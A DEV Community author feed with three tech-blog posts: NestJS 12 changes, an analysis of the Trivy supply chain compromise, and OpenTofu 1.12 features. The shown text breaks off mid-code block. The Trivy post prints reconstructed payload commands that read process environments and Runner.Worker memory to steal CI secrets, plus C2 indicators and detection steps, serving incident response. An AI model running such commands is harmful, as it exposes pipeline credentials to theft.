DEV Community: daniel jeong

NestJS 12 Deep Dive — Full ESM Migration, Standard Schema Route Validation, and the Vitest·oxlint·Rspack Toolchain

daniel jeong — Fri, 05 Jun 2026 06:06:19 +0000

If you've written Node.js backends, you've almost certainly been stopped cold by ERR_REQUIRE_ESM. That error — thrown the moment you try to require() an ESM-only package from a CommonJS project — has been one of the most time-wasting sources of friction in the Node.js ecosystem for years. On April 30, 2026, NestJS published a draft PR (#16391) outlining the scope of v12.0.0, with a decision that ends that friction head-on: a full ESM migration of every package. Alongside it, route decorators gain Standard Schema validation, and the default toolchain is swapped from Jest, ESLint, and Webpack to Vitest, oxlint, and Rspack. This post breaks down what NestJS 12 changes — and how existing projects should prepare — using the official PR and InfoQ reporting as primary sources.

1. NestJS 12 at a Glance

NestJS is a progressive Node.js framework for TypeScript server-side applications, providing a modular architecture on top of Express or Fastify. With over 75,000 GitHub stars, it is widely treated as an enterprise standard. v12 targets early Q3 2026, and its core distills into the changes summarized below.

Area	v11 (current)	v12 (early Q3 2026)
Module system	CommonJS	ESM (all packages migrated)
Input validation	class-validator centric	Standard Schema option (Zod, Valibot, ArkType)
Testing	Jest	Vitest + OXC (default for ESM projects)
Linter	ESLint	oxlint (default everywhere)
Bundler	Webpack	Rspack (Webpack deprecated)

Framework creator Kamil Myśliwiec stated in the PR that the transition "should not introduce major breaking changes for existing projects." There are a few minor breaking changes across other packages, but "nothing significant." The character of this major release is therefore not an API-breaking upgrade, but an infrastructure upgrade that modernizes the module system and developer tooling. The decorator-based programming model for controllers, providers, and modules stays the same, so most application code runs untouched. The center of gravity is the build, run, and validation pipeline — not the application surface.

2. Why ESM Now — require(esm) Stability as the Premise

ESM migration was deferred for a clear reason: with most of the ecosystem still CommonJS-based, going ESM-only would force users to absorb mandatory import syntax, top-level await constraints, and the absence of __dirname all at once. Myśliwiec pinpointed exactly this:

"The availability of require(esm) was the missing piece that made the move to ESM practical — without it, the migration wouldn't have made much sense." — Kamil Myśliwiec

require(esm) is a Node.js feature that lets CommonJS code load ES modules synchronously via require(). Introduced experimentally in 2024 and thoroughly battle-tested, it's now unflagged across all supported LTS lines (v20.19.0+, v22.12.0+) and marked stable. The key insight was that ESM is not inherently asynchronous: a module graph that contains no top-level await can be evaluated synchronously, and Node.js can tell this from the module's syntax. As a result, existing CommonJS projects can require() NestJS 12's ESM packages directly, minimizing migration friction.

// CommonJS project file: require() can load NestJS 12's ESM packages directly
// (Node.js v20.19+ / v22.12+ : require(esm) stable)
const { NestFactory } = require('@nestjs/core'); // ESM package, still works

// Separate file in a new ESM project: use import as usual
import { NestFactory } from '@nestjs/core';
import { AppModule } from './app.module.js'; // ESM: relative imports need the explicit .js extension

⚠️ Caution: require(esm) only applies to synchronously evaluable ESM. If the target ESM uses top-level await, require() throws ERR_REQUIRE_ASYNC_MODULE. In new ESM projects, relative imports must specify the extension (.js), and __dirname is not defined: derive paths from import.meta.url, or use import.meta.dirname on Node.js 20.11+.
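
As a rough illustration of the __dirname replacement, the sketch below rebuilds the CommonJS path helpers from a module URL using only Node.js built-ins. The function names and the config path in the usage comment are hypothetical, and the example assumes a POSIX file system.

```typescript
import { dirname, join } from 'node:path';
import { fileURLToPath } from 'node:url';

// Rebuild the CommonJS __filename/__dirname pair from an ESM module URL.
// Callers pass import.meta.url from their own module.
function moduleLocation(moduleUrl: string): { filename: string; dirname: string } {
  const filename = fileURLToPath(moduleUrl); // file:///srv/app/main.js -> /srv/app/main.js
  return { filename, dirname: dirname(filename) };
}

// Resolve a path relative to the calling module, like path.join(__dirname, ...).
function resolveFromModule(moduleUrl: string, ...segments: string[]): string {
  return join(moduleLocation(moduleUrl).dirname, ...segments);
}

// Usage inside an ESM file (hypothetical config path):
//   const configPath = resolveFromModule(import.meta.url, 'config', 'app.json');
```

Taking the URL as a parameter keeps the helper usable from any module and easy to test without touching import.meta directly.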

3. Standard Schema — Beyond class-validator

The biggest change backend developers will feel in NestJS 12 is Standard Schema support in route decorators. Every route decorator — @Body, @Query, @Param — accepts a new schema option that takes a Standard Schema–compatible object. The same capability extends to the serializer interceptor.

3.1 What Is Standard Schema?

Standard Schema is not a validation library but a roughly 60-line TypeScript interface. Designed jointly by the creators of Zod, Valibot, and ArkType, it works by having each library expose a ~standard property on its schemas, so any tool that understands Standard Schema can validate data without knowing which library produced the schema. Its core method is a single validate(unknown) that returns either a typed value on success or an array of issues on failure.

The value of this interface is eliminating vendor lock-in. It reduces the relationship between validation libraries and consuming tools from N×M to N+M. Start with familiar Zod, move to smaller-bundle Valibot, or adopt type-level ArkType — all without rewriting your route or handler code. NestJS validation has long been tightly bound to class-validator and class-transformer, a combination that depends on reflect-metadata for decorator metadata and requires DTOs to be declared as classes. Standard Schema support turns that constraint into a choice — especially valuable for teams that want a single schema source driving both runtime validation and static types, or for monorepos sharing the same Zod schema across frontend and backend.
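
To make the "any tool can validate without knowing the library" idea concrete, here is a minimal sketch of a library-agnostic consumer. The interface is a trimmed local copy of the Standard Schema v1 shape rather than the official type package, and nonEmptyString is a hypothetical hand-rolled schema standing in for a Zod, Valibot, or ArkType schema.

```typescript
// Trimmed-down local copy of the Standard Schema v1 shape (not the official types).
interface Issue {
  readonly message: string;
}
type Result<T> =
  | { readonly value: T; readonly issues?: undefined }
  | { readonly issues: ReadonlyArray<Issue> };
interface StandardSchemaLike<Output> {
  readonly '~standard': {
    readonly version: 1;
    readonly vendor: string;
    readonly validate: (value: unknown) => Result<Output> | Promise<Result<Output>>;
  };
}

// Library-agnostic consumer: it only touches the ~standard property.
function validateSync<T>(schema: StandardSchemaLike<T>, input: unknown): T {
  const result = schema['~standard'].validate(input);
  if (result instanceof Promise) {
    throw new TypeError('schema validates asynchronously; await it instead');
  }
  if (result.issues) {
    throw new Error(result.issues.map((issue) => issue.message).join('; '));
  }
  return result.value;
}

// Hypothetical hand-rolled schema; a real project would pass a library schema here.
const nonEmptyString: StandardSchemaLike<string> = {
  '~standard': {
    version: 1,
    vendor: 'example',
    validate: (value) =>
      typeof value === 'string' && value.length > 0
        ? { value }
        : { issues: [{ message: 'expected a non-empty string' }] },
  },
};
```

Because validateSync depends only on the shared property, swapping the validation library would not require touching the consumer, which is the N+M relationship described above.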

3.2 In Practice — Route Validation with a Zod Schema

// NestJS 12 — use a Standard Schema directly instead of a class-validator DTO
import { Controller, Post, Body } from '@nestjs/common';
import { z } from 'zod';

// Define a Zod schema (Zod already implements Standard Schema's ~standard)
const CreateUserSchema = z.object({
  email: z.string().email(),
  name: z.string().min(2).max(100),
  role: z.enum(['admin', 'instructor', 'student']).default('student'),
});

// Infer the type from the schema — no separate DTO class needed
type CreateUserDto = z.infer<typeof CreateUserSchema>;

@Controller('users')
export class UsersController {
  @Post()
  create(@Body({ schema: CreateUserSchema }) dto: CreateUserDto) {
    // dto is already validated, parsed, and type-safe
    return { created: dto.email, role: dto.role };
  }
}

Approach	Validation definition	Characteristics
class-validator (existing)	Decorators + DTO class	Runtime metadata, depends on reflect-metadata
Zod	`z.object({...})`	Most widely adopted, rich ecosystem
Valibot	Functional pipeline	Excellent tree-shaking, small bundles
ArkType	Type-string syntax	Type-system-level validation, high performance

💡 Tip: class-validator and Standard Schema are not mutually exclusive. Existing DTO-based validation still works in NestJS 12, so a safe strategy is to adopt Standard Schema for new endpoints first. Both validation packages are also flagged as optional — if you don't use them, they're never installed.

4. Toolchain Modernization — Rust Arrives

NestJS 12 swaps out its default tools en masse for faster feedback loops, aligning with the broader trend of Rust-powered JavaScript tooling becoming the standard. Notably, all three replacements — Vitest's transform layer, oxlint, and Rspack — share the same direction: native speed and ESM friendliness. Jest, ESLint, and Webpack were optimized for the CommonJS era; in ESM-native projects their configuration complexity and cold-start costs grew, accumulating with codebase size. The v12 toolchain swap is less a trend-chase than a necessary counterpart to the ESM migration.

4.1 Jest → Vitest (+ OXC)

All repositories and sample projects have migrated from Jest to Vitest, with OXC providing TypeScript decorator support. New ESM projects use Vitest by default, while CJS schematics continue to use Jest. Vitest's strengths are a fast Vite-based watch mode and native ESM execution.

# NestJS 12 CLI — prompts for module system at project creation
$ nest new my-api
? Which module system do you want to use?
  > ESM  (Vitest + oxlint default)
    CommonJS  (Jest + existing tools)

# With ESM selected, the test runner is Vitest
$ npm run test     # runs vitest

4.2 ESLint → oxlint, Webpack → Rspack

For linting, oxlint replaces ESLint across all projects. Written in Rust as the linter of the OXC toolchain, oxlint delivers checks tens of times faster on large codebases. For bundling, Rspack replaces Webpack, which is now deprecated. Rspack aims to be a drop-in replacement with a Webpack-compatible API and significantly faster build times.

⚠️ Caution: In roadmap discussions, whether the default bundler will be Vite + SWC instead of Rspack is not yet settled ("nothing is set in stone"). Requests to add Bun and Biome as CLI options exist but aren't officially adopted. Packages are expected to ship under the next npm tag before the stable release, so validating with next builds before production adoption is recommended.

5. Other Changes

Beyond the headline changes, several improvements affect real-world work. In microservices, the migration to NATS v3 follows the latest message transport client API; the Express adapter's graceful shutdown support lets in-flight requests finish safely during zero-downtime deployments and rolling updates. The WebSocket disconnect reason parameter lets you distinguish termination causes at the code level, useful for refining reconnection logic and observability.

Area	Change
Microservices	NATS v3 migration
Express adapter	Graceful shutdown support
WebSocket	disconnect reason parameter
Pipes	Improved `transform` type safety
Exceptions	Custom `errorCode` option in `HttpExceptionOptions`
Website	Full official site redesign planned

6. Preparing to Migrate — ManoIT's Recommended Strategy

A dedicated v11→v12 migration guide isn't published yet. But the PR's direction is clear, so ManoIT recommends a phased preparation for internal NestJS backends.

First, align your runtime to Node.js 22 LTS. You need v22.12+ or v20.19+ — where require(esm) is stable — to fully reap v12's ESM benefits. Second, adopt Standard Schema (Zod) validation for new endpoints to gradually reduce class-validator dependence. Third, adopt Vitest and oxlint locally ahead of time to shorten CI feedback loops and narrow the gap with v12's default toolchain. Fourth, run regression tests on next-tag builds in staging before the stable release to surface minor breaking changes early. Fifth, batch-align package upgrades with npm-check-updates, but pin core dependencies for predictability.

# Prepare for v12 — apply now on your current v11 project
node -v                          # confirm v22.12+ or v20.19+ (require(esm) stable)
npm i -D vitest @vitest/coverage-v8   # adopt alongside Jest, then migrate gradually
npm i -D oxlint                  # run alongside ESLint, compare speed, then switch
npm i zod                        # introduce Standard Schema validation (new endpoints)

# Before GA: pre-validate with the next tag once v12 pre-releases are published
npm i @nestjs/core@next @nestjs/common@next
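
The node -v check can also be automated, for example as a CI guard. The sketch below encodes the thresholds quoted in this post (v20.19+ and v22.12+); the function names are hypothetical, and treating release lines newer than 22 as supported is an assumption rather than something the PR states.

```typescript
// Parse 'v22.12.0' (the shape of process.version) into numeric parts.
function parseNodeVersion(version: string): [number, number, number] {
  const match = /^v?(\d+)\.(\d+)\.(\d+)/.exec(version);
  if (!match) throw new Error(`unrecognized Node.js version: ${version}`);
  return [Number(match[1]), Number(match[2]), Number(match[3])];
}

// True when require(esm) is unflagged according to the thresholds in this post.
function supportsRequireEsm(version: string): boolean {
  const [major, minor] = parseNodeVersion(version);
  if (major === 20) return minor >= 19;
  if (major === 22) return minor >= 12;
  return major >= 23; // assumption: lines newer than 22 keep the feature unflagged
}

// Usage: fail fast in a startup or CI script.
//   if (!supportsRequireEsm(process.version)) process.exit(1);
```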

💡 Tip: The most common ESM pitfalls are missing extensions on relative imports and use of __dirname. Setting tsconfig's module and moduleResolution to NodeNext and appending .js extensions while still on v11 dramatically reduces the code changes needed at v12.

7. Closing — The ESM Era for Backend Frameworks

NestJS 12's message is clear: with require(esm) stable, the last obstacle blocking the Node.js ecosystem's ESM migration is gone, and an enterprise standard framework fired the starting gun. ESM-native migration, freedom of validation libraries via Standard Schema, and modernization toward a Rust-based toolchain look like independent improvements, but they point in one direction: a faster, less locked-in, standards-faithful backend. GA lands in early Q3 2026, but the core lessons — align to Node 22 LTS, adopt schema validation incrementally, pre-adopt Vitest and oxlint — can start today on your v11 project. With preparation, migration won't be an event; for ready teams, it'll be a one-line dependency update.

This post was written by the ManoIT tech blog automation pipeline, cross-verifying the official NestJS PR #16391, InfoQ reporting, and the Standard Schema specification. Version and timeline details are accurate as of the writing date (2026-06-05) and may change at GA — re-check the official docs before applying. · AI writing assistance: Claude (Anthropic)

Originally published at ManoIT Tech Blog.

Inside the Trivy Supply Chain Compromise (CVE-2026-33634): 76 Hijacked Tags, Runner.Worker Memory Secret Theft & SHA Pinning

daniel jeong — Wed, 03 Jun 2026 23:40:21 +0000

What happens when the security scanner meant to protect your pipeline turns into the malware that steals your secrets? On March 19, 2026, that is exactly what happened to Trivy (aquasecurity). Trivy is the most widely adopted open-source vulnerability scanner in the cloud-native ecosystem, embedded in thousands of CI/CD pipelines as the aquasecurity/trivy-action GitHub Action — and by design it has access to pipeline secrets. Compromise a tool like that, and the attacker doesn't just get code: they get cloud credentials, SSH keys, and Kubernetes tokens — everything the pipeline touches.

This post breaks down the official advisory GHSA-69fq-xp46-6x23 (CVE-2026-33634, Critical) as the primary source: what happened, how the payload worked, and the SHA-pinning-based remediation ManoIT applied to its internal pipelines.

1. What Happened — When a Security Tool Becomes the Weapon

This was not a single poisoned package. It was a multi-channel strike that hit GitHub Actions, release binaries, Docker Hub images, and package repositories simultaneously. The threat actor — TeamPCP (the payload calls itself "TeamPCP Cloud Stealer") — force-pushed 76 of 77 tags in aquasecurity/trivy-action and all 7 tags in aquasecurity/setup-trivy to malicious commits at 17:43 UTC on March 19. Less than an hour later, at 18:22 UTC, a forged v0.69.4 binary was distributed across GitHub Releases, GHCR, Docker Hub, ECR Public, deb/rpm, and get.trivy.dev.

It didn't stop there. Three days later, on March 22, the attacker used separately stolen Docker Hub credentials to push malicious v0.69.5, v0.69.6, and latest images, bypassing GitHub-based controls entirely. The same day, using a service account token (Argon-DevOps-Mgt) bridging two GitHub orgs, they defaced all 44 repositories in Aqua Security's aquasec-com org with a tpcp-docs- prefix and exposed proprietary source.

Time (UTC)	Event	Channel
Late Feb – 3/1	Initial breach, partial (non-atomic) credential rotation	Release infra
3/19 17:43	trivy-action 76 + setup-trivy 7 tags force-pushed	GitHub Actions
3/19 18:22	Forged v0.69.4 binary distributed (~3h exposure)	All channels
3/20 05:40	trivy-action tags restored (~12h exposure closed)	GitHub Actions
3/22	v0.69.5/v0.69.6/latest images (~10h), 44 repos defaced	Docker Hub

2. Root Cause — Non-Atomic Credential Rotation

The March incident didn't come out of nowhere — it was a continuation of a supply chain attack that began in late February 2026. After the initial disclosure on March 1, credential rotation was performed but was not atomic — not all credentials were revoked simultaneously. While rotation dragged on over several days, the attacker used still-valid tokens to re-exfiltrate the newly rotated secrets, retaining the residual access that enabled the March 19 attack.

⚠️ Caution: In incident response, "we rotated the credentials" is not sufficient. Any window in which some old credentials are still valid while new ones are being issued becomes the channel for the second breach. Rotation must be atomic: bulk-invalidate old credentials and issue new ones as a single unit of work.
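
One way to picture the ordering constraint is the sketch below: every old credential is revoked before any replacement is issued, and the rotation aborts if a single revocation fails. The Credential type and the revoke/issue hooks are hypothetical placeholders; a real implementation would call provider APIs asynchronously and handle retries.

```typescript
interface Credential {
  id: string;
}

interface RotationResult {
  revoked: string[];
  issued: string[];
}

// Hypothetical hooks: revoke() invalidates one credential and reports success,
// issue() mints the replacement and returns its identifier.
function rotateAtomically(
  credentials: Credential[],
  revoke: (credential: Credential) => boolean,
  issue: (credential: Credential) => string,
): RotationResult {
  // Phase 1: revoke everything. No new secret exists yet, so a still-valid
  // old token has nothing fresh to steal.
  const failed = credentials.filter((credential) => !revoke(credential));
  if (failed.length > 0) {
    throw new Error(`revocation incomplete: ${failed.map((c) => c.id).join(', ')}`);
  }
  // Phase 2: only after every old credential is dead, issue replacements.
  const issued = credentials.map((credential) => issue(credential));
  return { revoked: credentials.map((c) => c.id), issued };
}
```

The design choice is deliberate: aborting before phase 2 means a partial failure leaves services without credentials for a while, which is an outage, but it never leaves a new secret readable by an old token.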

3. Breaking Down the Attack

3.1 trivy-action Tag Hijacking — `@v0.34.0` Is a Pointer, Not a Contract

The core of this attack abused two by-design properties of Git and GitHub: mutable tags and self-declared commit identity. By default, tags are not immutable references. Anyone with push access can repoint an existing tag to an entirely different commit. The attacker force-pushed 76 tags to malicious commits and injected the payload into entrypoint.sh so it ran immediately before the legitimate Trivy scan. Pipelines looked normal while the stealer ran silently underneath. The imposter commits spoofed maintainer identities, but GitHub flagged them with "This commit does not belong to any branch on this repository."

3.2 Forging the v0.69.4 Binary — goreleaser `--skip=validate`

1) Push commit 1885610c
   -> swap actions/checkout reference to imposter commit 70379aad
   -> composite action that downloads malicious Go source from a typosquatted domain
2) Add --skip=validate to goreleaser -> disable binary integrity validation
3) Tag that commit as v0.69.4 -> trigger the release pipeline

A single line that turns off build validation (--skip=validate) nullified the entire integrity guarantee.

3.3 The Payload — Reading Secrets Straight Out of Runner.Worker Memory

The most dangerous technique bypassed GitHub Actions' secret masking head-on.

# Payload behavior (reconstructed)
# 1) Scan environment variables of all runner processes
cat /proc/*/environ          # first-pass collection of SSH keys / env secrets

# 2) Key technique: read the Runner.Worker process memory directly
#    A base64-encoded Python payload targets values marked isSecret:true
#    -> secrets that show as *** in logs are extracted in plaintext from memory
python3 -c '... read /proc/<worker_pid>/mem ...'

# 3) Sweep 50+ paths: AWS/GCP/Azure tokens, k8s configs,
#    Docker configs, Terraform state, Git credentials, wallets, shell history

Collected data was AES-256-CBC + RSA-4096 hybrid encrypted and exfiltrated via HTTPS POST to the typosquatted C2 domain scan[.]aquasecurtiy[.]org (mimicking Aqua's name, 45.148.10.212 in Amsterdam). If the C2 was unreachable and a GitHub PAT was present, the malware created a public tpcp-docs repository on the victim's account and uploaded the stolen data as release assets — turning GitHub itself into the exfiltration channel.

4. Affected vs. Safe Versions

The lesson is blunt: the safe reference is a full commit SHA, not a version tag. Why the safe versions are safe is telling too — v0.69.3 and trivy-action v0.35.0 were protected by GitHub Immutable Releases (enabled 3/3 and 3/4, before the attack).

Component	Affected	Exposure	Safe
trivy binary	v0.69.4	~3h (3/19)	v0.69.3 or earlier
trivy (Docker Hub)	v0.69.5, v0.69.6, latest	~10h (3/22–24)	v0.69.3 or earlier (digest-pinned)
trivy-action	tags 0.0.1–0.34.2 (76)	~12h (3/19–20)	v0.35.0 (`57a97c7`) or SHA-pinned
setup-trivy	all releases	~4h (3/19)	v0.2.6 (`3fb12ec`) or SHA-pinned

⚠️ Caution: A malicious v0.70.0 push was stopped just before the tag landed, so treat any v0.70.0 reference in logs as suspicious. Also, mirror.gcr.io may still serve cached malicious images — reference by digest (@sha256:...). The force-pushed old tags (0.0.1–0.34.2) hardened into immutable releases and can't be recreated under the same names; they were re-published with a v prefix.

5. Detection & Response Playbook

You need a fast answer to "were we exposed, and if so, what do we rotate?" Treat every secret accessible to a workflow that ran a compromised version during the exposure windows as compromised.

# 1) Fallback exfil trace -- search org for tpcp-docs repos (presence = successful exfil)
gh repo list <ORG> --limit 1000 --json name \
  | jq -r '.[].name' | grep -i 'tpcp-docs'

# 2) Check 3/19-20 workflow run logs for trivy-action tag references
#    (gh run list returns only 20 runs by default, so raise --limit)
gh run list --repo <ORG>/<REPO> --created 2026-03-19..2026-03-20 --limit 1000 \
  --json databaseId,workflowName,createdAt

# 3) Block C2 indicators at the network level + review historical connections
#    domain: scan[.]aquasecurtiy[.]org   IP: 45.148.10.212

Then rotate all potentially exposed secrets atomically: GitHub tokens, cloud provider credentials, registry tokens, SSH keys, DB passwords. Audit for secondary compromise — unauthorized repos, unexpected workflow runs, infrastructure changes.
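
The date filter in step 2 is day-granular, so a tighter first pass can help. The sketch below narrows the gh run list JSON to the trivy-action exposure window from the timeline in section 1 (3/19 17:43 to 3/20 05:40 UTC); the function and constant names are hypothetical.

```typescript
interface WorkflowRun {
  databaseId: number;
  workflowName: string;
  createdAt: string; // ISO 8601 timestamp, as printed by gh
}

// trivy-action exposure window from the incident timeline (UTC).
const TRIVY_ACTION_WINDOW = {
  start: Date.parse('2026-03-19T17:43:00Z'),
  end: Date.parse('2026-03-20T05:40:00Z'),
};

// Parse the JSON array printed by `gh run list --json databaseId,workflowName,createdAt`.
function parseRunList(json: string): WorkflowRun[] {
  return JSON.parse(json) as WorkflowRun[];
}

// Keep only runs created inside the window (inclusive on both ends).
function runsInWindow(runs: WorkflowRun[], exposure = TRIVY_ACTION_WINDOW): WorkflowRun[] {
  return runs.filter((run) => {
    const created = Date.parse(run.createdAt);
    return created >= exposure.start && created <= exposure.end;
  });
}
```

createdAt records when a run was queued, not when the scan step executed, so long-running or delayed jobs that started just before the window still deserve a manual look.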

6. The Real Fix — SHA Pinning and Immutable Releases

The single most important lesson: mutable tags are a liability. Pin every third-party Action to a full commit SHA, and even if a tag is repointed via force-push, your workflow only runs the commit you intended.

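# BAD -- mutable tag (can be force-pushed at any time)
- uses: aquasecurity/trivy-action@0.34.0

# GOOD -- pin to the full 40-character commit SHA, with the version in a comment.
# The SHAs below are abbreviated for readability; GitHub Actions does not resolve
# short SHAs, so use the complete commit SHA in a real workflow.
- uses: aquasecurity/trivy-action@57a97c7  # v0.35.0
  with:
    scan-type: 'fs'
    severity: 'CRITICAL,HIGH'
- uses: aquasecurity/setup-trivy@3fb12ec    # v0.2.6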
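
Pinning only helps if it is enforced. As a minimal sketch, the function below scans workflow text line by line and reports every uses: reference whose ref is not a full 40-hex commit SHA. It is a regex-based approximation rather than a YAML parser, and the names are hypothetical.

```typescript
interface UnpinnedRef {
  line: number;
  action: string;
  ref: string;
}

const FULL_SHA = /^[0-9a-f]{40}$/;

// Report every `uses: owner/repo@ref` whose ref is not a full 40-hex commit SHA.
function findUnpinnedActions(workflowYaml: string): UnpinnedRef[] {
  const findings: UnpinnedRef[] = [];
  workflowYaml.split('\n').forEach((text, index) => {
    const match = /^\s*(?:-\s*)?uses:\s*['"]?([^\s'"@#]+)@([^\s'"#]+)/.exec(text);
    if (!match) return; // not a uses: line, or a local action without @ref
    const action = match[1];
    const ref = match[2];
    if (action.startsWith('docker://')) return; // image references are pinned by digest instead
    if (!FULL_SHA.test(ref)) findings.push({ line: index + 1, action, ref });
  });
  return findings;
}
```

Version tags and abbreviated SHAs are both reported, so a check like this could run in CI and fail the build when the returned list is non-empty.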

Verify binaries and images with sigstore signatures, confirming both integrity and signing time (that it was signed before the 3/19 attack).

# sigstore verification for the binary
cosign verify-blob \
  --certificate-identity-regexp 'https://github\.com/aquasecurity/' \
  --certificate-oidc-issuer 'https://token.actions.githubusercontent.com' \
  --bundle trivy_0.69.2_Linux-64bit.tar.gz.sigstore.json \
  trivy_0.69.2_Linux-64bit.tar.gz
# Verified OK  -> additionally confirm the signing time predates the 3/19 attack

Defense layer	Action	Attack surface closed
Reference immutability	Pin Actions to full SHA, images to digest	Tag hijacking / force-push
Integrity verification	sigstore/cosign signature + signing time check	Forged binaries / images
Release protection	Enable GitHub Immutable Releases	Release asset rewriting
Credential hygiene	Atomic rotation, least-privilege tokens, short-lived OIDC	Residual access / second breach
Runner monitoring	Watch CI runners like production hosts	/proc/<pid>/mem secret theft

7. How ManoIT Responded Internally

ManoIT used this incident to roll the following into its GitOps/CI pipelines in stages. First, pin every third-party GitHub Action to a full SHA, with Renovate/Dependabot raising update PRs at SHA granularity. Second, digest-pin container base and scanner images, and exclude cache mirrors like mirror.gcr.io from the trust boundary. Third, migrate CI secrets from static PATs to OIDC-based short-lived tokens so that even if stolen, their lifetime is short. Fourth, write "atomic rotation" explicitly into the incident runbook — coupling revoke and reissue into a single operation to eliminate the time window. Fifth, attach runtime security (eBPF-based process/network monitoring) to CI runner nodes to detect /proc/<pid>/mem access and anomalous outbound traffic.

8. Closing — Your Security Tools Are Part of Your Attack Surface

The message of the Trivy compromise is clear: your security tools are part of your attack surface. Trivy holds privileged access to CI secrets by design, and that very privilege makes it an ideal target. Single-layer defense doesn't survive modern multi-channel, multi-stage supply chain attacks — only defense in depth, stacking reference immutability, integrity verification, credential hygiene, and runner monitoring, holds up. The project has since recovered its normal release cadence, shipping v0.71.0 (2026-06-01) as the latest stable, and the core lessons — SHA pinning and Immutable Releases — are now standard practice well beyond Trivy. The point isn't to distrust your tools — it's to pin your references immutably and prove their integrity.

Category	Indicator (IoC)
C2 domain	`scan[.]aquasecurtiy[.]org`
C2 IP	`45.148.10.212` (Amsterdam)
Rogue trivy commit	`1885610c`
Malicious checkout commit	`70379aad`
Compromised setup-trivy commit	`8afa9b9f9183b4e00c46e2b82d34047e3c177bd0`
Exfil artifact	public repos named `tpcp-docs`
Commit warning	"This commit does not belong to any branch on this repository"

Originally published on the ManoIT blog. Cross-verified against the official advisory GHSA-69fq-xp46-6x23 / CVE-2026-33634. Version and IoC data are current as of 2026-06-04; re-check the official advisory before acting. · AI writing assist: Claude (Anthropic)


OpenTofu 1.12.0: Dynamic prevent_destroy, destroy=false, Identity Import & Provider Checksum Automation

daniel jeong — Wed, 03 Jun 2026 00:55:24 +0000

Anyone who has run Infrastructure as Code (IaC) in production for a while knows it: the hard part isn't creating a resource — it's protecting that resource differently per environment, detaching it safely, importing existing ones accurately, and not wrestling with lock files in CI.

OpenTofu 1.12.0 (released May 14, 2026) takes direct aim at exactly these operational pains. Forked from Terraform after HashiCorp's 2023 BSL license change, OpenTofu added OCI registry support and native S3 locking in 1.10, ephemeral values and the enabled meta-argument in 1.11, and has now diverged into a mature IaC engine on its own track rather than "a fork chasing Terraform." This article breaks down five of 1.12's key features from an operations and architecture angle, then lays out how ManoIT rolled them into our internal multi-cloud IaC.

1. Why OpenTofu 1.12 Now — From Fork to Its Own Track

Some context first. When IBM announced its acquisition of HashiCorp in April 2024 (the deal closed in February 2025), enterprise uncertainty around the BSL license grew, accelerating OpenTofu evaluation. As of April 2026, roughly 12% of IaC practitioners have adopted OpenTofu, with another 27% planning to evaluate or expand it, while organizations like Boeing, Capital One, and AMD run it in production. Many teams run both: Terraform for legacy, OpenTofu for greenfield.

The important shift is that the two tools are no longer two versions of the same product. OpenTofu has diverged toward native state encryption, provider-defined functions, and a faster release cadence; Terraform has gone toward AI-assisted features and deeper HCP integration. 1.12 sits in the middle of that divergence as a signal of operational maturity: "lifecycle control made dynamic, imports made accurate, lock files made automatic."

Version	Released	Theme	Headline
1.10.0	2025-06	Deployment / security base	OCI registry, native S3 lock, external key providers (state encryption)
1.11	H2 2025	Expressiveness	Ephemeral values, `enabled` meta-argument, stronger moved/removed
1.12.0	2026-05-14	Operational maturity	Dynamic prevent_destroy, destroy=false, identity import, checksum automation, -json-into

2. Dynamic prevent_destroy — Per-Environment Delete Protection via Variables

prevent_destroy is a lifecycle argument that tells OpenTofu to error out if a plan would destroy a given object. It's commonly used for objects whose deletion would cause a major outage, or whose recreation requires manual work outside OpenTofu (like restoring a backup). The problem: until now this value was a static decision hard-coded into configuration. If you share a module across prod and dev — wanting the prod database extremely hard to delete but the dev one easy to replace — a static value left you stuck.

1.12.0 lets prevent_destroy be defined dynamically in terms of other values within the same module (such as input variables). It's the first lifecycle argument to be made dynamic, with more planned (umbrella issue #1329).

variable "prevent_destroy_database" {
  type    = bool
  default = true   # Protected by default. Turn off via the dev module block.
}

resource "example_database" "example" {
  # ...

  lifecycle {
    # 1.12: can reference variables -> control delete protection per environment from one module
    prevent_destroy = var.prevent_destroy_database
  }
}

Ops tip: keep the shared module default at true (protected) and pass false explicitly only from dev/staging callers. "Safe by default, exceptions explicit" is the pattern that prevents deletion accidents with the least code.

3. destroy = false — Remove From State Without Destroying the Remote Object

Another new lifecycle meta-argument, destroy = false, lets you remove a managed resource from state without first destroying the remote object. Previously, "I want to take this out of OpenTofu management but keep the actual infrastructure alive" had to be worked around with removed blocks or state rm. Expressed as a lifecycle argument, the intent now stays in code.

resource "aws_s3_bucket" "legacy_logs" {
  bucket = "manoit-legacy-logs"

  lifecycle {
    # Exclude from destroy plans -> bucket is preserved even when dropped from state
    destroy = false
  }
}

⚠️ Warning: an object dropped from state via destroy = false is no longer tracked by OpenTofu. If other code creates a new resource with the same name, you may hit an "already exists" conflict — sort out your import/naming policy right after detaching.

4. Resource Identity Import — From Guessing IDs to Schema-Based

In OpenTofu, importing existing infrastructure has long meant "getting the resource's id string exactly right." But id formats vary wildly by resource type, and resources using composite keys (multiple combined attributes) are awkward to express in a single id. 1.12.0 introduces import by resource identity, pointing at the remote object via the attributes defined by the resource type's identity schema, instead of a single id string.

For example, hashicorp/aws's aws_ssm_maintenance_window_target has an identity schema requiring both id and window_id. You can now specify these via the import block's identity argument.

import {
  to = aws_ssm_maintenance_window_target.example

  # 1.12: point precisely via identity schema attributes instead of guessing id
  identity = {
    window_id = "mw-0123456789abcdef0"
    id        = "12345678-90ab-cdef-1234-567890abcdef"
  }
}

For bulk imports, combine this with the import block's for_each (loopable imports, available since 1.7). The identity-schema + for_each combo turns "deterministically importing hundreds of existing resources" into a single block.

5. Provider Checksum & Install Improvements — The End of tofu providers lock

This is the change CI/CD operators will welcome most. Previously, teams using a global plugin cache or local mirror found the dependency lock file missing checksums after tofu init, forcing a separate tofu providers lock run. The lock file only had zh: (zip hashes), while the h1: hashes needed for cache/mirror verification were only computed locally.

In 1.12.0, the OpenTofu Registry officially provides the full set of checksum formats needed by all install methods. So a single tofu init fills the lock file with both h1: and zh: hashes, letting you verify a global cache or local mirror immediately. tofu providers lock now remains only for its original purpose: populating origin-registry checksums on systems reconfigured to use an alternate install source.

# After upgrading, the first init auto-adds h1: hashes to the lock file
tofu init

# No longer needed just because of cache/mirror (as long as you use the default registry)
# tofu providers lock -platform=linux_amd64 -platform=darwin_arm64

# Confirm both zh:/h1: hash types landed in the lock file
grep -E '"(zh|h1):' .terraform.lock.hcl | head
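
For a per-provider view rather than a raw grep, the sketch below counts h1: and zh: entries in each provider block of the lock file text. It relies on a simple regex and assumes the usual layout where each block's closing brace sits at the start of a line; the function names are hypothetical.

```typescript
interface ProviderHashes {
  provider: string;
  h1: number;
  zh: number;
}

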